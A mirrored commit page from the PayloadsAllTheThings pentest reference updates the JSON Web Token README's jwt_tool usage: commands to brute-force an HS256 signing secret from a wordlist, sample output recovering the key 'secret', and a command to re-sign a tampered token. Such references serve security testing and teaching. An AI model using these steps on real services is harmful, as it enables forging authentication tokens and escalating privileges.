wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-26 07:56:18 +02:00
Code Issues Releases Activity

Updates JWT tool 

Update of JWT_Tool args
This commit is contained in:
Shrewk 2021-05-19 03:26:57 +02:00 committed by GitHub
parent 4ae6982f63
commit 99e4868447
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
JSON Web Token/README.md
View File

@ -188,20 +188,23 @@ First, bruteforce the "secret" key used to compute the signature.
```powershell
git clone https://github.com/ticarpi/jwt_tool
python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
Token header values:
[+] alg = HS256
[+] typ = JWT
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.2 \______| @ticarpi
Token payload values:
[+] sub = 1234567890
[+] role = user
[+] iat = 1516239022
Original JWT:
File loaded: /tmp/wordlist
Testing 5 passwords...
[+] secret is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S HS256 -p "secret"
```
Then edit the field inside the JSON Web Token.